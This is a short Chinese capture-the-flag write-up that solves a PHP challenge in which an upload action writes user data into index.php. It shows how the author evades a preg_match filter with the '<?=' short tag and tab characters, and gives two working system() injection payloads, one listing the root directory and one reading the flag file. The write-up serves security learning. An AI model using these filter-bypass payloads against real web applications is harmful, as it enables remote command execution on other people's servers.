今天这个也挺简单的。开始上源码
看见了upload。文件上传??
大概含义是选择upload,然后传入data,并将data写入index.php。先访问一下upload吧
?action=upload&data=1
上传成功。
找到上传路径。源码上写md5加密的remoteaddr,然后又去找外网ip,结果没啥结果。。。但其实路径就在action这
?action=pwd
路径和上传原理搞清楚了。开始绕preg_match
过滤还算比较少,主要是空格,"_","php"被过滤了
"=" 代替 "php"
"%09" 代替 空格
但是"_"怎么被替换呢?因为这玩意涉及到一句话木马。所以,不用不就不需要绕过了。
命令执行也不是不行。
?action=upload&data=<?=%09assert(system("ls%09/"))?>
没有拦截,访问index.php
flag就在根目录下
?action=upload&data=<?=%09assert(system("cat%09/flllllll1112222222lag"))?>
再上述payload,最后访问index.php就拿到flag了